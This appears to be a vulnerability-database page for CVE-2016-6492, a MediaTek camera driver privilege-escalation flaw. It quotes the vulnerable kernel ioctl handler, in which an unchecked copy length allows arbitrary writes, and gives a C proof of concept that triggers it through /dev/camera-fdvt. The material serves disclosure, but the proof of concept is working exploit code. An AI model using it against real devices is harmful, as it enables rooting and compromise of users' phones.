Lucene search
K

MediaTek Driver Privilege Escalation

🗓️ 31 Jul 2016 00:00:00Reported by unLimit Security GroupType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 61 Views

MediaTek Driver Privilege Escalation, High risk CVE-2016-649

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the Android operating system, which allows a hacker to increase their privileges
17 Feb 201700:00
bdu_fstec
CNVD
MediaTek Driver Privilege Vulnerability
4 Aug 201600:00
cnvd
CVE
CVE-2016-6492
12 Jan 201723:00
cve
Cvelist
CVE-2016-6492
12 Jan 201723:00
cvelist
EUVD
EUVD-2016-7414
7 Oct 202500:30
euvd
NVD
CVE-2016-6492
12 Jan 201723:59
nvd
OSV
CVE-2016-6492
12 Jan 201723:59
osv
OSV
UBUNTU-CVE-2016-6492
12 Jan 201723:59
osv
Prion
Design/Logic Flaw
12 Jan 201723:59
prion
Positive Technologies
PT-2017-1211
12 Jan 201700:00
ptsecurity
Rows per page
`Details  
=======  
  
Product: MTK  
platform:MT6595 -- MT6797  
Security Risk: High  
CVE ID: CVE-2016-6492  
Credit: unLimit Security Group  
  
Introduction  
============  
1.  
https://github.com/jawad6233/MT6795.kernel/blob/1251b008a51be5cd97ce6da916f34fc6afa2b1d7/alps/kernel-3.10/drivers/misc/mediatek/mach/mt6795/camera_fdvt.c#L415  
ioctl cmd MT6573FDVTIOC_T_SET_FDCONF_CMD  
functon: MT6573 FDVT set reg to HW buffer (MT6573FDVT_SetRegHW)  
  
2.  
Vulnerability Detail:  
  
static int MT6573FDVT_SetRegHW(MT6573FDVTRegIO * a_pstCfg)  
{  
MT6573FDVTRegIO *pREGIO = NULL;  
u32 i=0;  
static UINT8 illegalWRLogTimes = 0;  
  
if (NULL == a_pstCfg) {  
LOG_DBG("Null input argrment \n");   
return -EINVAL;   
}  
  
pREGIO = (MT6573FDVTRegIO*)a_pstCfg;  
  
if(copy_from_user((void*)pMT6573FDVTWRBuff.u4Addr, (void *) pREGIO->pAddr, pREGIO->u4Count * sizeof(u32))) { // pREGIO->u4Count Length not check,cause any address writeable. if pREGIO-> u4Count control within the effective range, pREGIO-> pAddr can be written to the specified location  
LOG_DBG("ioctl copy from user failed\n");  
return -EFAULT;  
}  
  
if(copy_from_user((void*)pMT6573FDVTWRBuff.u4Data, (void *) pREGIO->pData, pREGIO->u4Count * sizeof(u32))) {  
LOG_DBG("ioctl copy from user failed\n");  
return -EFAULT;  
}  
  
//pMT6573FDVTWRBuff.u4Counter=pREGIO->u4Count;  
//LOG_DBG("Count = %d\n", pREGIO->u4Count);   
  
for( i = 0; i < pREGIO->u4Count; i++ ) {  
if ((FDVT_ADDR + pMT6573FDVTWRBuff.u4Addr[i]) >= FDVT_ADDR && (FDVT_ADDR + pMT6573FDVTWRBuff.u4Addr[i]) <= (FDVT_ADDR + FDVT_MAX_OFFSET))  
{  
//LOG_DBG("write addr = 0x%08x, data = 0x%08x\n", FDVT_ADDR + pMT6573FDVTWRBuff.u4Addr[i], pMT6573FDVTWRBuff.u4Data[i]);   
FDVT_WR32(pMT6573FDVTWRBuff.u4Data[i], FDVT_ADDR + pMT6573FDVTWRBuff.u4Addr[i] );  
}  
else  
{  
if(illegalWRLogTimes < 10)  
{  
LOG_DBG("Error: Writing Memory(0x%8x) Excess FDVT Range!\n", (unsigned int)(FDVT_ADDR + pMT6573FDVTWRBuff.u4Addr[i]));  
illegalWRLogTimes ++;  
}  
else if(illegalWRLogTimes == 10)  
{  
LOG_DBG("Error: Writing Memory Excess FDVT Range - Log Too Much, Stop Same Logs");  
illegalWRLogTimes ++;  
}  
else{}  
}  
}  
  
return 0;  
}  
  
  
3.POC:  
/*  
* Abuse it for root shell  
*/  
#include <stdio.h>  
#include <sys/mman.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <errno.h>  
#include <sys/ioctl.h>  
#include <stdbool.h>  
#include <sys/mount.h>  
#include <dirent.h>  
  
#ifndef MAX_BUFFER_SIZE  
#define MAX_BUFFER_SIZE 512  
#endif  
  
typedef struct   
{  
unsigned int *pAddr;  
unsigned int *pData;  
unsigned int u4Count;  
} MT6573FDVTRegIO;  
  
#define FDVT_IOC_MAGIC 'N'  
#define MT6573FDVTIOC_T_SET_FDCONF_CMD _IOW(FDVT_IOC_MAGIC, 0x03, MT6573FDVTRegIO)  
  
const static char *driver = "/dev/camera-fdvt";  
  
void set_fdconf_cmd()  
{  
int fd = 0;  
MT6573FDVTRegIO argc;  
  
  
fd = open(driver, O_RDWR);  
  
if (fd < 0)   
{  
printf("Failed to open %s, with errno %s\n", driver, strerror(errno));  
system("echo 1 > /data/local/tmp/log");  
exit(EXIT_FAILURE);  
}  
  
argc.pAddr = 0x1024;  
argc.pData = 0x1024;  
argc.u4Count = 0x1024;  
  
if(ioctl(fd, MT6573FDVTIOC_T_SET_FDCONF_CMD, &argc) < 0)  
{  
printf("Allocation of structs failed, %s\n", strerror(errno));  
system("echo 2 > /data/local/tmp/log");  
exit(EXIT_FAILURE);  
}  
  
close(fd);  
}  
  
  
int main(int argc, char **argv, char **env) {  
set_fdconf_cmd();  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Jul 2016 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.01122
61